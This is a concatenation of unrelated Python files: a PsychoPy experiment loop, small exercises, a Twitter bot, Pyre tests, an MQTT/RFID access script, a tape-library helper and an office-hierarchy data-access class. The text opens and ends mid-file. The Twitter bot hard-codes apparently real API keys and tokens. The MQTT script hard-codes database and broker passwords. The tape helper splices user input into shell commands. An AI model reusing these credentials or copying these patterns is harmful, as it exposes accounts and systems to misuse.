            #keep track of start time/frame for later
            stimulus.tStart=t#underestimates by a little under one frame
            stimulus.frameNStart=frameN#exact frame index
            stimulus.setAutoDraw(True)
        #*trial_word1* updates
        if t>=0.0 and trial_word1.status==NOT_STARTED:
            #keep track of start time/frame for later
            trial_word1.tStart=t#underestimates by a little under one frame
            trial_word1.frameNStart=frameN#exact frame index
            trial_word1.setAutoDraw(True)
        #*trial_word2* updates
        if t>=0.0 and trial_word2.status==NOT_STARTED:
            #keep track of start time/frame for later
            trial_word2.tStart=t#underestimates by a little under one frame
            trial_word2.frameNStart=frameN#exact frame index
            trial_word2.setAutoDraw(True)
        #*trial_word3* updates
        if t>=0.0 and trial_word3.status==NOT_STARTED:
            #keep track of start time/frame for later
            trial_word3.tStart=t#underestimates by a little under one frame
            trial_word3.frameNStart=frameN#exact frame index
            trial_word3.setAutoDraw(True)
        #*trial_word4* updates
        if t>=0.0 and trial_word4.status==NOT_STARTED:
            #keep track of start time/frame for later
            trial_word4.tStart=t#underestimates by a little under one frame
            trial_word4.frameNStart=frameN#exact frame index
            trial_word4.setAutoDraw(True)
        #*key_resp* updates
        if t>=0.0 and key_resp.status==NOT_STARTED:
            #keep track of start time/frame for later
            key_resp.tStart=t#underestimates by a little under one frame
            key_resp.frameNStart=frameN#exact frame index
            key_resp.status=STARTED
            #keyboard checking is just starting
            key_resp.clock.reset() # now t=0
            event.clearEvents()
        if key_resp.status==STARTED:#only update if being drawn
            theseKeys = event.getKeys(keyList=['1', '2', '3', '4'])
            if len(theseKeys)>0:#at least one key was pressed
                key_resp.keys=theseKeys[-1]#just the last key pressed
                key_resp.rt = key_resp.clock.getTime()
                #was this 'correct'?
                if (key_resp.keys==str(correctResponse)): key_resp.corr=1
                else: key_resp.corr=0
                #abort routine on response
                continueRoutine=False
        #check if all components have finished
        if not continueRoutine: #a component has requested that we end
            routineTimer.reset() #this is the new t0 for non-slip Routines
            break
        continueRoutine=False#will revert to True if at least one component still running
        for thisComponent in trialComponents:
            if hasattr(thisComponent,"status") and thisComponent.status!=FINISHED:
                continueRoutine=True; break#at least one component has not yet finished
        #check for quit (the [Esc] key)
        if event.getKeys(["escape"]):
            core.quit()
        #refresh the screen
        if continueRoutine:#don't flip if this routine is over or we'll get a blank screen
            win.flip()
    #End of Routine "trial"
    for thisComponent in trialComponents:
        if hasattr(thisComponent,"setAutoDraw"): thisComponent.setAutoDraw(False)
    #check responses
    if len(key_resp.keys)==0: #No response was made
        key_resp.keys=None
        #was no response the correct answer?!
        if str(correctResponse).lower()=='none':key_resp.corr=1 #correct non-response
        else: key_resp.corr=0 #failed to respond (incorrectly)
    #store data for trials (TrialHandler)
    trials.addData('key_resp.keys',key_resp.keys)
    trials.addData('key_resp.corr',key_resp.corr)
    if key_resp.keys != None:#we had a response
        trials.addData('key_resp.rt',key_resp.rt)
    thisExp.nextEntry()
    #completed 1 repeats of 'trials'
    #NOTE(review): key_resp.rt is written even when no response was made, and
    #stim[11:13] assumes a fixed image path layout -- confirm both.
    datFile.write('%s\t%s\t%s\t%s\t%s\n'%(trials.thisTrialN+1,stim[11:13],key_resp.keys,key_resp.corr,key_resp.rt))
#save data for this loop
#trials.saveAsPickle(filename+'trials', fileCollisionMethod='rename')
#Shutting down:
win.close()
core.quit()
|
@dataclasses.dataclass
class Nodes(Variable):
    """Variable holding the per-geoid node attribute table.

    NOTE(review): relies on ``self.g`` (the owning graph/config object) being
    available before ``__post_init__`` runs -- confirm against the Variable
    base class.
    """
    name: str = 'nodes'
    def __post_init__(self):
        # Pull year, level, and the attribute column list from the owner.
        self.yr = self.g.shapes_yr
        self.level = self.g.level
        self.attrs = listify(self.g.node_attrs) + listify(Districts)
        super().__post_init__()
    def get(self):
        """Populate self.df from the combined table when the base lookup misses."""
        exists = super().get()
        if not exists['df']:
            # Read the attribute columns, rename 'total' -> 'pop', index by geoid.
            self.df = (read_table(self.g.combined.tbl, cols=self.attrs)
                       .rename(columns={'total':'pop'}).set_index('geoid'))
# N = total number of trees, M = target total length of cut wood.
N, M = map(int, input().split())
trees_length = list(map(int, input().split()))

# For every candidate cutter height 1 .. max_height-1, record a pair
# [height, total wood obtained when every taller tree is cut at that height].
total_cut_lengths = []
for height in range(1, max(trees_length)):
    gathered = sum(tree - height for tree in trees_length if tree >= height)
    total_cut_lengths.append([height, gathered])
print(total_cut_lengths)
def is_target_length(target, array):
    """Binary-search *array* for the cut height whose total equals *target*.

    :param target: desired total length of cut wood
    :param array: list of [height, total_cut_length] pairs whose totals are in
        strictly decreasing order (higher cuts yield less wood)
    :return: the height with an exact total match, or the height at the final
        probe position when no exact match exists
    """
    current_min = 0
    current_max = len(array) - 1
    current_guess = (current_min + current_max) // 2
    while current_min <= current_max:
        # BUG FIX: compare against the `target` parameter instead of the
        # module-level global M, so the function works for any argument.
        if target == array[current_guess][1]:
            return array[current_guess][0]
        elif target < array[current_guess][1]:
            # Totals decrease as height grows: need a higher cut, go right.
            current_min = current_guess + 1
        else:
            current_max = current_guess - 1
        current_guess = (current_min + current_max)//2
    return array[current_guess][0]
print(is_target_length(M, total_cut_lengths)) |
"""
Program: customer.py
Author: Paul Ford
Last date modified: 07/1/2020
Purpose: Create my first class
"""
class Customer:
    """A customer record with a validated id, name, and phone number.

    :param cust_id: integer customer id in the range 1000-9999
    :param lname: last name (letters and a few punctuation characters only)
    :param fname: first name (letters and a few punctuation characters only)
    :param pnumber: phone number formatted as 'XXX-XXX-XXXX' (12 characters)
    :raises InvalidNameException: if a name contains disallowed characters
    :raises InvalidPhoneNumberFormat: if the phone number is malformed
    :raises InvalidCustomerIdException: if cust_id is not an int in range
    """
    # Constructor
    def __init__(self, cust_id, lname, fname, pnumber):
        # check to see if first and last name is alpha characters, if not throw exception
        name_characters = set("ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz!'- ' '")
        if not (name_characters.issuperset(str(lname))):
            raise InvalidNameException
        if not (name_characters.issuperset(str(fname))):
            raise InvalidNameException
        # first check to see if number is 12 digits long
        if len(pnumber) != 12:
            raise InvalidPhoneNumberFormat
        # now check for the dashes in the right spot
        for i in range(12):
            if i in [3, 7]:
                if pnumber[i] != '-':
                    raise InvalidPhoneNumberFormat
            # last verify all the values are numbers
            # BUG FIX: isalnum() also accepts letters; the comment and intent
            # require digits, so use isdigit() instead.
            elif not pnumber[i].isdigit():
                raise InvalidPhoneNumberFormat
        # check to see if its an int
        if not isinstance(cust_id, int):
            raise InvalidCustomerIdException
        # check range
        if cust_id < 1000 or cust_id > 9999:
            raise InvalidCustomerIdException
        # setting attributes
        self._customer_id = cust_id
        self._last_name = lname
        self._first_name = fname
        self._phone_number = pnumber

    def __str__(self):
        """Return a one-line summary: id, last name, first name, phone."""
        return str(self._customer_id) + ", " + \
            self._last_name + ", " + self._first_name + ", " + \
            self._phone_number

    def __repr__(self):
        """Return a labelled multi-line description of the customer."""
        # Adjacent string literals concatenate; the stray trailing line
        # continuation after the last '\n' has been removed.
        return ("Customer ID: " + str(self._customer_id) + '\n'
                "Name: " + self._last_name + " " + self._first_name + '\n'
                "Phone: " + self._phone_number + '\n')

    # Methods
    def display(self):
        """Return the formatted attributes, confirming the id is an int.

        :raises AttributeError: if the customer id is not an int
        """
        if isinstance(self._customer_id, int):
            return self.__repr__()
        else:
            raise AttributeError("'Customer' object has no attribute 'cid'")
class InvalidCustomerIdException(Exception):
    """Raised when the customer id is not an int in the range 1000-9999."""
    pass
class InvalidNameException(Exception):
    """Raised when a first or last name contains disallowed characters."""
    pass
class InvalidPhoneNumberFormat(Exception):
    """Raised when the phone number does not match the XXX-XXX-XXXX format."""
    pass
# Drivers: exercise each validation rule of Customer.
try:
    cust = Customer(99, 'Paul', 'Ford', '123-123-1234')
except InvalidCustomerIdException:
    print('The customerID is incorrect.')
try:
    # BUG FIX: the second positional argument is lname, so this case tests the
    # last name; the printed message previously said "First name".
    cust = Customer(99, 3434, 'Ford', '123-123-1234')
except InvalidNameException:
    print('Last name is incorrect')
try:
    # BUG FIX: the third positional argument is fname, so this case tests the
    # first name; the printed message previously said "Last name".
    cust = Customer(99, 'Paul', 41234, '123-123-1234')
except InvalidNameException:
    print('First name is incorrect')
try:
    cust = Customer(99, 'Paul', 'Ford', '123-123-124')
except InvalidPhoneNumberFormat:
    print('Phone number is in the wrong format')
|
"""
How it works / Logic flow
1a. Bot listens to the keyword "rtindru"
- Tweepy returns list of tweets
1b. Bot checks if the tweet is about "recommend movie"
2. Bot asks the user "what's your favorite movie?" - we got the movie_name inside the main function
- User responds with the movie name
3a. Bot takes the movie name from the user's reply
3b.Bot gets recommendations from movie api
4. Bot replies to the user with top 2/3 recommendations
"""
import tweepy
# SECURITY: real consumer keys and access tokens are hard-coded here; they are
# effectively public now and should be revoked and loaded from environment
# variables or a config file instead.
auth = tweepy.OAuthHandler('wnHnUjjJVfGKIkjgAlAWIX7Ii', 'hLcXusk6opqfFJETXJAF4dzMx5x8Pr4v0TH22cGwY5SMRHPJhU')
auth.set_access_token('54509995-ZTtceIZD0esJ57apOshkRK5O8tKCeGCa82x7p7osF', 'Pnbrj0tapaPHBeGGShASEccBtrPIibEyVa1TgYnZW4MOq')
api = tweepy.API(auth)
class RecommendStreamListener(tweepy.StreamListener):
    """Replies to each matching tweet asking for the user's favorite movie."""
    def on_status(self, status):
        # Fires for every tweet matched by the stream's track filter.
        print("RecommendStreamListener", status.text)
        text = "@{} What's your favorite movie?".format(status.user.screen_name)
        reply = api.update_status(text, in_reply_to_status_id=status.id)
        print("Reply ID", reply.id)
class ResponseStreamListener(tweepy.StreamListener):
    """Logs tweets from the followed account (the user's movie-name replies)."""
    def on_status(self, status):
        print("ResponseStreamListener", status.text)
def main():
    """
    Goal: Searches twitter for the user name "rtindru"
    Input: str, user_name to search tweets for
    Output: All tweets with the username
    """
    respStreamListener = ResponseStreamListener()
    # NOTE(review): is_async is passed to the Stream constructor here but to
    # filter() below; tweepy expects it on filter() -- confirm against the
    # installed tweepy version.
    respStream = tweepy.Stream(auth = api.auth, listener=respStreamListener, is_async=True)
    respStream.filter(follow=["54509995"])
    recStreamListener = RecommendStreamListener()
    recStream = tweepy.Stream(auth = api.auth, listener=recStreamListener)
    recStream.filter(track=["goosfraba recommendation movie", "@rtindru recommend movie"], is_async=True)
def get_movie_name():
    # TODO: extract the movie name from the user's reply (step 2 of the flow).
    pass
def bot_recc(movie_name):
    """
    Goal: Get recommends from API
    Input: str, movie_name provides movie name
    Output: Top 3 best movies
    """
    pass
def reply_recc():
    # TODO: reply to the user with the top recommendations (step 4 of the flow).
    pass
if __name__ == "__main__":
    main()
|
import unittest
from unittest.mock import MagicMock
from .. import query_api
class QueryAPITest(unittest.TestCase):
    """Unit tests for query_api helpers, driven by a mocked Pyre connection."""
    def test_defines(self) -> None:
        pyre_connection = MagicMock()
        # Server response is the raw JSON shape; defines() should build
        # Define/DefineParameter objects from it.
        pyre_connection.query_server.return_value = {
            "response": [
                {
                    "name": "a.foo",
                    "parameters": [{"name": "x", "annotation": "int"}],
                    "return_annotation": "int",
                }
            ]
        }
        self.assertEqual(
            query_api.defines(pyre_connection, ["a"]),
            [
                query_api.Define(
                    name="a.foo",
                    parameters=[query_api.DefineParameter(name="x", annotation="int")],
                    return_annotation="int",
                )
            ],
        )
    def test_get_class_hierarchy(self) -> None:
        pyre_connection = MagicMock()
        pyre_connection.query_server.return_value = {
            "response": [{"Foo": ["object"]}, {"object": []}]
        }
        self.assertEqual(
            query_api.get_class_hierarchy(pyre_connection),
            {"Foo": ["object"], "object": []},
        )
        pyre_connection.query_server.return_value = {
            "response": [
                {"Foo": ["object"]},
                {"object": []},
                # This should never happen in practice, but unfortunately is something
                # to consider due to the type of the JSON returned. The last entry wins.
                {"Foo": ["Bar"]},
                {"Bar": ["object"]},
            ]
        }
        self.assertEqual(
            query_api.get_class_hierarchy(pyre_connection),
            {"Foo": ["Bar"], "Bar": ["object"], "object": []},
        )
        # An error payload should map to None rather than raising.
        pyre_connection.query_server.return_value = {"error": "Found an issue"}
        self.assertEqual(query_api.get_class_hierarchy(pyre_connection), None)
    def test_get_call_graph(self) -> None:
        pyre_connection = MagicMock()
        pyre_connection.query_server.return_value = {
            "response": {
                "async_test.foo": [],
                "async_test.bar": [
                    {
                        "locations": [
                            {
                                "path": "async_test.py",
                                "start": {"line": 6, "column": 4},
                                "stop": {"line": 6, "column": 7},
                            }
                        ],
                        "kind": "function",
                        "target": "async_test.foo",
                    }
                ],
            }
        }
        self.assertEqual(
            query_api.get_call_graph(pyre_connection),
            {
                "async_test.foo": [],
                "async_test.bar": [
                    query_api.CallGraphTarget(
                        target="async_test.foo",
                        kind="function",
                        locations=[
                            query_api.Location(
                                path="async_test.py",
                                start=query_api.Position(line=6, column=4),
                                stop=query_api.Position(line=6, column=7),
                            )
                        ],
                    )
                ],
            },
        )
|
'''
Create a BMI calculator, BMI which stands for Body Mass Index can be calculated using the formula:
BMI = (weight in Kg)/(Height in Meters)^2.
Write python code which can accept the weight and height of a person and calculate his BMI.
note: Make sure to use a function which accepts the height and weight values and returns the BMI value.
'''
def BMC(w, h):
    """Return the Body Mass Index: weight (kg) divided by height (m) squared."""
    return w / (h ** 2)
# Prompt for the two measurements and report the computed BMI.
weight = float(input('Enter the weight of the person'))
height = float(input('Enter the height of the person'))
bmi = BMC(weight, height)
print('The BMI value=' + str(bmi))
import tensorflow as tf
import numpy as np
from sklearn import preprocessing
# Linear regression on the trees dataset using the TensorFlow 1.x low-level API.
trees = np.loadtxt('Data/Data/trees.csv', delimiter=',', dtype=np.float32, skiprows=1)
# trees = preprocessing.add_dummy_feature(trees)
# Prepend a bias column of ones (the dataset has 31 rows).
trees = np.insert(trees, 0, np.ones(31), axis=1)
xx = trees[:, :-1]  # features incl. bias column
y = trees[:, -1:]   # target column
print(xx.shape, y.shape)
x = tf.placeholder(tf.float32, shape=[None, 3])
w = tf.Variable(tf.random_normal([3, 1], -1, 1))
hx = tf.matmul(x, w)
# Mean squared error; y is baked into the graph as a numpy constant, so only
# x is fed at run time.
cost = tf.reduce_mean((hx - y) ** 2)
optimizer = tf.train.GradientDescentOptimizer(0.0001)
train = optimizer.minimize(cost)
sess = tf.Session()
sess.run(tf.global_variables_initializer())
# NOTE(review): only 10 gradient steps at lr=0.0001 -- almost certainly not
# converged; confirm whether this is intentional (demo) or needs more epochs.
for i in range(10):
    sess.run(train, {x: xx})
    print(i, sess.run(cost, {x: xx}))
y_hat = sess.run(hx, {x: xx})
print(y_hat)
# Predict for two new feature rows (the leading 1. is the bias term).
y_hat = sess.run(hx, {x: [[1., 10., 70.], [1., 15., 80.]]})
print(y_hat)
sess.close()
# FAZENDO OS IMPORTS NECESSARIOS PARA A APLICACAO
import json
import sys
import os, urlparse
import paho.mqtt.client as mqtt
import pymysql
#import cgitb
from datetime import datetime
# Database host IP, taken from the command line.
ipMV = sys.argv[1]
# DATABASE CONNECTION - database, user, password and host.
# SECURITY: credentials are hard-coded; move them to environment/config.
conn = pymysql.connect(
    db='dbru',
    user='admin',
    passwd='admin123',
    host=ipMV)
c = conn.cursor()
#cgitb.enable()
# DATABASE LOOKUP CODE
# Checks whether the given RFID exists in the database.
# If it does, returns a dict containing the name and id of the user
# registered for that RFID.
def consulta(num):
    """Look up the user registered for RFID *num*.

    :param num: RFID string read from the MQTT queue (untrusted input)
    :return: dict {'userId': int, 'userName': str}; userId is 0 and userName
        is '' when the RFID is unknown
    """
    retorno = {}
    retorno["userId"] = 0
    retorno["userName"] = ""
    # SECURITY FIX: use a parameterized query instead of splicing the
    # MQTT-supplied value into the SQL string (SQL injection risk).
    sql = "SELECT id,nome FROM Usuario WHERE rfid = %s"
    c.execute(sql, (num,))
    r = c.fetchall()
    if len(r) > 0:
        retorno["userId"] = int(r[0][0])
        retorno["userName"] = r[0][1] + ""
    return retorno
# Checks whether the given user has an open record tied to their RFID.
# If not, the time is recorded and the status is set to open (1).
# If so, the time is recorded and the status is set to closed (0).
# NOTE(review): the function below is dead code preserved as a string literal;
# kept verbatim. Consider deleting or restoring it.
'''def registro(userData):
try:
sql_consulta = "SELECT id FROM History WHERE idUser = %i AND status = 1;" % (userData["userId"])
c.execute(sql_consulta)
r = c.fetchall()
if len(r) > 0:
timestamp = datetime.now()
id_hist = r[0][0]
sql_update = "UPDATE `History` SET `status` = 0, `saida` = '%s' WHERE id = %i;" % (timestamp,id_hist)
#print sql_update
c.execute(sql_update)
conn.commit()
return "SAINDO/" + userData["userName"]
else:
sql_insert = "INSERT INTO History (idUser,status) VALUES (%i,1);" % (userData["userId"])
c.execute(sql_insert)
conn.commit()
return "ENTRANDO/" + userData["userName"]
except:
return "ERRO";'''
# We override the behavior of some of MQTT's own callback functions.
# Executed when a new connection is made.
# NOTE(review): this callback is declared with (self, mosq, obj, rc) although
# it is assigned as a plain function -- confirm it matches the installed
# paho-mqtt version's expected on_connect signature.
def on_connect(self, mosq, obj, rc):
    print("rc: " + str(rc))
# Executed when a new message is read from the queue.
# Publishes on the reply queue whether access was / was not granted,
# plus the registered name for display on the LCD.
def on_message(mosq, obj, msg):
    print(msg.topic + " " + str(msg.qos) + " " + str(msg.payload))
    mensagem = msg.payload
    print type(mensagem)
    mjson = json.loads(mensagem)
    print mjson['nome']
    # Dead code preserved as a string literal (previous lookup/reply logic).
    '''cons = consulta(str(msg.payload))
if(cons["userName"] != ""):
#retorno = registro(cons)
retorno = "%s" % cons
else:
retorno = "Usuario nao cadastrado."
mqttc.publish("retorno", retorno)
print(retorno) '''
# Executed on every publish.
def on_publish(mosq, obj, mid):
    print("Publish: " + str(mid))
# Executed for every queue that is subscribed to.
def on_subscribe(mosq, obj, mid, granted_qos):
    print("Subscribed: " + str(mid) + " " + str(granted_qos))
# Executed on every log write.
def on_log(mosq, obj, level, string):
    print(string)
# Create the mqtt.Client object.
mqttc = mqtt.Client()
# Override MQTT's native callback hooks.
mqttc.on_message = on_message
mqttc.on_connect = on_connect
mqttc.on_publish = on_publish
mqttc.on_subscribe = on_subscribe
# CloudMQTT URL of the instance holding the queues.
# The instance URL is composed of: mqtt://m12.cloudmqtt.com: + PORT
# The port can be found in the instance information.
# NOTE(review): os.environ.get is called with the hostname as the variable
# name, so the hard-coded default URL is used unless an env var literally
# named 'm10.cloudmqtt.com' exists -- confirm intent.
url_str = os.environ.get('m10.cloudmqtt.com','mqtt://m10.cloudmqtt.com:16184')
url = urlparse.urlparse(url_str)
# Set the user with access to the queues.
# username_pw_set takes the MQTT username and password.
# SECURITY: broker credentials are hard-coded.
mqttc.username_pw_set("adm", "54321")
mqttc.connect(url.hostname, url.port)
# Subscribe to the "acesso" (access) queue.
mqttc.subscribe("acesso", 0)
# Loop until an error occurs: the server listens on the "acesso" queue
# and writes replies on the "retorno" queue.
rc = 0
while rc == 0:
    rc = mqttc.loop()
print("rc: " + str(rc))
|
class Sentinel:
    """A sentinel value that orders after every other object.

    Acts like "positive infinity" for comparison purposes: every
    greater-than style comparison answers True and every less-than
    style comparison answers False, whatever the other operand is.
    """

    def __gt__(self, other):
        return True

    def __ge__(self, other):
        return True

    def __lt__(self, other):
        return False

    def __le__(self, other):
        return False
if __name__ == '__main__':
    marker = Sentinel()
    # Reflected comparison: int.__ge__ returns NotImplemented, so Python
    # falls back to Sentinel.__le__, which is False.
    print(5 >= marker)
    print(marker >= 56)
|
#!/usr/bin/python
import os,sys
# Tape-library (MSS) helper: request files via jget, or view/cancel jqueue jobs.
mss = os.environ['MSS']
outpath = os.environ['VOL']+'/data'
imax = 0  # maximum number of files to request (0 = no limit)
run = ''  # run-number filter, zero-padded to 6 digits
action = 'request'
args = sys.argv
if len(args)<2: sys.exit('no arguments')
# Parse command-line flags.
for i,a in enumerate(args):
    if a in ['-r','-run']: run = args[i+1].zfill(6)
    elif a in ['-m','-max']: imax = int(args[i+1])
    elif a in ['-f','-from']: mss = args[i+1]
    elif a in ['-t','-to']: outpath = args[i+1]
    elif a in ['-c','-cancel']: action = 'cancel'
    elif a in ['-v','-view']: action = 'view'
# request files
if action=='request':
    l = [mss+'/'+x for x in os.listdir(mss) if run in x]
    l.sort()
    l.sort(key=len)
    # NOTE(review): slicing to imax+1 keeps imax+1 files, not imax -- confirm.
    if imax!=0: l = l[:imax+1]
    for x in l:
        print 'copy file {0} to {1}'.format(x,outpath)
        os.system('jget -n {0} {1}'.format(x,outpath))
# view queue
elif action=='view':
    if run=='': os.system('jqueue user mlevilla request jobState submit stub' )
    else: os.system('jqueue user mlevilla request jobState submit stub | grep '+run)
# cancel jobs
elif action=='cancel':
    f= os.popen('jqueue user mlevilla request stub' )
    l = [x.split(' ') for x in f.readlines()[1:] if run in x]
    for x in l:
        # Strip leading empty fields left by the whitespace split.
        while x[0]=='': del x[0]
        os.system('jcancel '+x[0])
sys.exit(0)
|
from sqlalchemy.ext.declarative import declarative_base
from sqlalchemy.orm import relationship
from sqlalchemy import Column, Integer, ForeignKey, Table, String, Date, UniqueConstraint
from models.base_model import Base
# Many-to-many association table between teachers and subjects.
# Rows cascade-delete with either side, and each (teacher, subject)
# pair may appear at most once.
teacher_subject_links = Table('teacher_subject', Base.metadata,
    Column('id_teacher', Integer, ForeignKey('teacher.id', ondelete="CASCADE")),
    Column('id_subject', Integer, ForeignKey('subject.id', ondelete="CASCADE")),
    UniqueConstraint('id_teacher', 'id_subject', name='unique_teacher_subject')
)
class Teacher(Base):
    """ORM model for the 'teacher' table."""
    __tablename__ = 'teacher'
    id = Column(Integer, primary_key=True)
    first_name = Column(String)
    last_name = Column(String)
    phone_number = Column(String)
    def __init__(self, id, first_name, last_name, phone_number):
        # NOTE(review): `id` shadows the builtin and is assigned explicitly
        # rather than database-generated -- confirm that is intended.
        self.id = id
        self.first_name = first_name
        self.last_name = last_name
        self.phone_number = phone_number
    def __repr__(self):
        """Unambiguous representation for logs and the REPL."""
        return "<Teacher(id={}, first_name='{}', last_name='{}', phone_number='{}')>" \
            .format(self.id, self.first_name, self.last_name, self.phone_number)
|
# -*- coding: utf-8 -*-
import logging, uuid
from itertools import groupby
class Offices:
    """Data-access layer for the ``offices`` schema.

    Every public method receives an open DB-API connection ``con``
    (psycopg2-style, ``%s`` placeholders); transaction handling is the
    caller's responsibility. Offices are returned as plain dicts with keys
    id / parent / name / telephone / email (child lists under 'childrens').
    """

    # Office id of the provisional "new attendance user" fallback group.
    # HACK: provisional solution inherited from the original code.
    _NEW_USER_OFFICE_ID = '45cc065a-7033-4f00-9b19-d7d097129db3'

    def _convertToDict(self, off):
        """Map a (id, parent, name, telephone, email) row onto a dict."""
        return {'id': off[0], 'parent': off[1], 'name': off[2], 'telephone': off[3], 'email': off[4]}

    def _getChildOffices(self, con, offices):
        """Return every descendant (flat list of dicts) of the given office ids."""
        if len(offices) <= 0:
            return []
        # Breadth-first walk over the whole subtree below ``offices``.
        roffices = []
        pids = []
        pids.extend(offices)
        while len(pids) > 0:
            toFollow = []
            toFollow.extend(pids)
            pids = []
            for oId in toFollow:
                cur = con.cursor()
                cur.execute('select id,parent,name,telephone,email from offices.offices where parent = %s', (oId,))
                if cur.rowcount <= 0:
                    continue
                for cOff in cur:
                    cId = cOff[0]
                    if cId not in pids:
                        roffices.append(self._convertToDict(cOff))
                        pids.append(cId)
        return roffices

    def _getChildOfficesTree(self, con, office):
        """Return the children of ``office`` as a recursively nested tree."""
        cur = con.cursor()
        cur.execute('select id,parent,name,telephone,email from offices.offices where parent = %s', (office['id'],))
        if cur.rowcount <= 0:
            return []
        childrens = []
        for cOff in cur:
            off = self._convertToDict(cOff)
            off['childrens'] = self._getChildOfficesTree(con, off)
            for child in off['childrens']:
                child['childrens'] = self._getChildOfficesTree(con, child)
            childrens.append(off)
        return childrens

    def _getParentOffices(self, con, offices):
        """Return every ancestor (flat list of dicts) of the given office ids."""
        if len(offices) <= 0:
            return []
        cur = con.cursor()
        cur.execute('select id,parent,name,telephone,email from offices.offices')
        if cur.rowcount <= 0:
            return []
        offrs = cur.fetchall()
        # Resolve the offices passed as parameter to full rows.
        data = []
        for oid in offices:
            for x in offrs:
                if x[0] == oid:
                    data.append(self._convertToDict(x))
                    break
        parents = []
        parentsIds = []
        for office in data:
            pid = office['parent']
            # Climb towards the root, stopping at already-collected ancestors.
            while (pid is not None) and (pid not in parentsIds):
                for parent in offrs:
                    if parent[0] == pid:
                        parentsIds.append(pid)
                        parents.append(self._convertToDict(parent))
                        pid = parent[1]
                        break
                else:
                    # Dangling parent id not present in the table: stop
                    # climbing (the original looped forever here).
                    pid = None
        return parents

    def _getOfficesData(self, con, officesIds):
        """Return the office dicts for the given ids.

        Bug fix: the original tested ``len(offices)`` before ``offices``
        existed, raising NameError on every call.
        """
        if len(officesIds) <= 0:
            return []
        cur = con.cursor()
        cur.execute('select id,parent,name,telephone,email from offices.offices where id in %s', (tuple(officesIds),))
        if cur.rowcount <= 0:
            return []
        offices = []
        for off in cur:
            offices.append(self._convertToDict(off))
        return offices

    def findOffice(self, con, id):
        """Look up one office by id; return None when it does not exist."""
        cur = con.cursor()
        cur.execute('select id,parent,name,telephone,email from offices.offices where id = %s', (id,))
        off = cur.fetchone()
        if off:
            return self._convertToDict(off)
        else:
            return None

    def findOffices(self, con, ids):
        """Look up several offices; missing ids produce None entries."""
        offices = []
        for id in ids:
            offices.append(self.findOffice(con, id))
        return offices

    def getOffices(self, con):
        """Return every office as a flat list of dicts."""
        cur = con.cursor()
        cur.execute('select id,parent,name,telephone,email from offices.offices')
        offs = cur.fetchall()
        offices = []
        for off in offs:
            offices.append(self._convertToDict(off))
        return offices

    def getOfficesTree(self, con):
        """Return all offices arranged as a forest (roots with nested 'childrens')."""
        offices = self.getOffices(con)
        tree = []
        # Initialise every office's child list first.
        for off in offices:
            off['childrens'] = []
        for off in offices:
            parent = None
            for off2 in offices:
                if off['parent'] == off2['id']:
                    parent = off2
            if parent is None:
                tree.append(off)
            else:
                parent['childrens'].append(off)
        return tree

    def getOfficesUsers(self, con, offices):
        """Return the distinct user ids belonging to the given offices or any
        of their descendants.

        ``offices`` is a list of office ids. Fix: the original appended the
        descendant ids to the caller's list; we now work on a copy.
        """
        if len(offices) <= 0:
            return []
        users = []
        cur = con.cursor()
        logging.debug("------------------------")
        logging.debug(offices)
        logging.debug("------------------------")
        officesIds = list(offices)
        child = self._getChildOffices(con, officesIds)
        for o in child:
            officesIds.append(o['id'])
        logging.debug(officesIds)
        cur.execute('select distinct user_id from offices.offices_users ou where ou.office_id in %s', (tuple(officesIds),))
        if cur.rowcount <= 0:
            return []
        for u in cur:
            users.append(u[0])
        return users

    def getOfficesByUser(self, con, userId, tree=False, parents=False):
        """Return the offices a user belongs to; with tree=True also include
        every descendant, with parents=True every ancestor."""
        cur = con.cursor()
        cur.execute('select id,parent,name,telephone,email from offices.offices o, offices.offices_users ou where ou.user_id = %s and o.id = ou.office_id', (userId,))
        if cur.rowcount <= 0:
            return []
        offices = []
        ids = []
        for off in cur:
            ids.append(off[0])
            offices.append(self._convertToDict(off))
        if tree:
            offices.extend(self._getChildOffices(con, ids))
        if parents:
            offices.extend(self._getParentOffices(con, ids))
        return offices

    def getOfficesTreeByUser(self, con, userId):
        """Return the offices a user belongs to, arranged as trees; a user
        office reachable from another returned office is folded into that
        office's subtree instead of being listed as a root."""
        cur = con.cursor()
        cur.execute('select id,parent,name,telephone,email from offices.offices o, offices.offices_users ou where ou.user_id = %s and o.id = ou.office_id', (userId,))
        if cur.rowcount <= 0:
            return []
        offices = []
        for off in cur:
            o = self._convertToDict(off)
            o['childrens'] = self._getChildOfficesTree(con, o)
            if o['childrens'] is None:
                o['childrens'] = []
            offices.append(o)
        # Re-parent: attach an office under another returned office (or one
        # of its direct children) when that office is its parent.
        removeOffices = []
        for off in offices:
            for off2 in offices:
                if off['parent'] == off2['id']:
                    removeOffices.append(off)
                    if 'childrens' not in off2:
                        off2['childrens'] = []
                    off2['childrens'].append(off)
                    break
                if 'childrens' not in off2:
                    continue
                for child in off2['childrens']:
                    if off['parent'] == child['id']:
                        removeOffices.append(off)
                        if 'childrens' not in child:
                            child['childrens'] = []
                        child['childrens'].append(off)
                        break
                else:
                    continue
                break
        offices = [x for x in offices if x not in removeOffices]
        return offices

    def getOfficesRoles(self, con, userId):
        """Return every role assignment of ``userId`` across all offices."""
        cur = con.cursor()
        cur.execute('select user_id,office_id,role from offices.offices_roles ou where ou.user_id = %s', (userId,))
        if cur.rowcount <= 0:
            return []
        roles = []
        for r in cur:
            roles.append({
                'userId': r[0],
                'officeId': r[1],
                'role': r[2]
            })
        return roles

    def getOfficesByUserRole(self, con, userId, tree=False, role='autoriza'):
        """Return the offices where ``userId`` holds ``role``; with tree=True
        also include every descendant office (without duplicates)."""
        cur = con.cursor()
        cur.execute('select id,parent,name,telephone,email from offices.offices o, offices.offices_roles ou where ou.user_id = %s and o.id = ou.office_id and ou.role = %s', (userId, role))
        if cur.rowcount <= 0:
            return []
        offices = []
        ids = []
        for off in cur:
            ids.append(off[0])
            offices.append(self._convertToDict(off))
        if tree:
            childrens = self._getChildOffices(con, ids)
            offices.extend(x for x in childrens if x not in offices)
        return offices

    def getUserInOfficesByRole(self, con, userId, tree=False, role='autoriza'):
        """Return the ids of every user belonging to the offices in which
        ``userId`` holds ``role`` (debug print removed)."""
        offices = self.getOfficesByUserRole(con, userId, tree, role)
        if offices is None or len(offices) <= 0:
            return []
        officesIds = [x['id'] for x in offices]
        return self.getOfficesUsers(con, officesIds)

    def getUsersWithRoleInOffices(self, con, officesIds, role='autoriza'):
        """Return [(userId, sendMail)] for every user holding ``role`` in the
        given offices."""
        if officesIds is None or len(officesIds) <= 0:
            return []
        cur = con.cursor()
